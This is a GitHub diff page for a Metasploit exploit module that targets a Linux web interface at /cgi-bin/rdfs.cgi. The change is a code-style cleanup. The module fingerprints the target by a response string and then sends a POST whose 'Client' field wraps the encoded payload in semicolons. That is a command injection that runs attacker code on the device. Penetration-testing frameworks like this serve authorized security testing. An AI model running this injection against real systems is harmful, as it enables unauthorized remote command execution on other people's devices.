File tree Expand file tree Collapse file tree 1 file changed +5
-7
lines changed
modules/exploits/linux/http Expand file tree Collapse file tree 1 file changed +5
-7
lines changed Original file line number Diff line number Diff line change 3
3
# Current source: https://github.com/rapid7/metasploit-framework
4
4
##
5
5
6
- require 'msf/core'
7
-
8
6
class MetasploitModule < Msf ::Exploit ::Remote
9
7
Rank = ExcellentRanking
10
8
@@ -50,20 +48,20 @@ def initialize(info={})
50
48
def check
51
49
res = send_request_cgi ( {
52
50
'method' => 'GET' ,
53
- 'uri' => normalize_uri ( '/cgi-bin/rdfs.cgi' )
51
+ 'uri' => '/cgi-bin/rdfs.cgi'
54
52
} )
55
- if res and res . body =~ / Follow administrator instructions to enter the complete path/ then
56
- return Exploit ::CheckCode ::Appears
53
+ if res && res . body . include? ( " Follow administrator instructions to enter the complete path" )
54
+ Exploit ::CheckCode ::Appears
57
55
else
58
- return Exploit ::CheckCode ::Safe
56
+ Exploit ::CheckCode ::Safe
59
57
end
60
58
end
61
59
62
60
def exploit
63
61
print_status ( 'Sending request' )
64
62
send_request_cgi (
65
63
'method' => 'POST' ,
66
- 'uri' => normalize_uri ( '/cgi-bin/rdfs.cgi' ) ,
64
+ 'uri' => '/cgi-bin/rdfs.cgi' ,
67
65
'vars_post' => {
68
66
'Client' => ";#{ payload . encoded } ;" ,
69
67
'Download' => 'Download'
You can’t perform that action at this time.
0 commit comments